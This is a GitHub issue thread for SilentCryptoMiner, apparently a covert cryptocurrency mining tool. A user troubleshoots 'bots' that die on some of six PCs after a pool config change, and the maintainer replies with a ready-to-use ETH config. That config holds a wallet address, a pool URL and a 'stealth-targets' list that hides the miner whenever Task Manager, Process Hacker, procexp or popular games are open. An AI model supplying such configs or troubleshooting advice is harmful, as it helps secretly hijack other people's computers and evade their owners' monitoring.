### ISSUE TITLE
Config making bots die!

### ISSUE THREAD

**Issue by OPgood** [UnamSanctam/SilentCryptoMiner#256]
I have my base set up using GPU for etc 
And Monero for cpu 
On same build 

When I config change it my ETC to ETH it dies forever no matter what I do change it back to default or none or back to etc says offline while the Monero is still running on the same computer I have tried everything and it seems to be randomly happening Becuase for some of my miners when I switch it to ETH it switches fine no issues and works but the others die 

I have done this to 6 different pc 2/6 died but there Monero on the same build is still running so the pc is still on but switching the config from etc to ETH killed those 2 not sure why

**Comment by UnamSanctam** [comment]
Could be that they can't connect to the pool (IP could be blocked, though technically they should use the builder settings as a backup then unless they are also wrong), could also be that the GPU closes down the miner as well (sometimes laptops GPUs can do that) though technically the watchdog should start it again unless the laptop completely disables the GPU which can happen.

**Comment by OPgood** [comment]
It’s a desktop they all were desktops so I don’t know what’s causing this issue. Why would changing the config from the panel make this happen?

**Comment by UnamSanctam** [comment]
Only thing I can really think of is that the pool you change to doesn't work for those computers (IP could be blocked) and that your builder settings don't work either.

**Comment by OPgood** [comment]
Could you share your ETC/ETH json config the way you use it I want to see if something is wrong with mine.

**Comment by UnamSanctam** [comment]
Here's an ETH configuration:
```
{
    "url": "stratums://0xe8D349AC6087d114B1EF41a2E51aa442a3EA50F6.{COMPUTERNAME}@eu1.ethermine.org:5555",
    "algo": "ethash",
    "max-gpu": 50,
    "idle-wait": 1,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe"
}
```
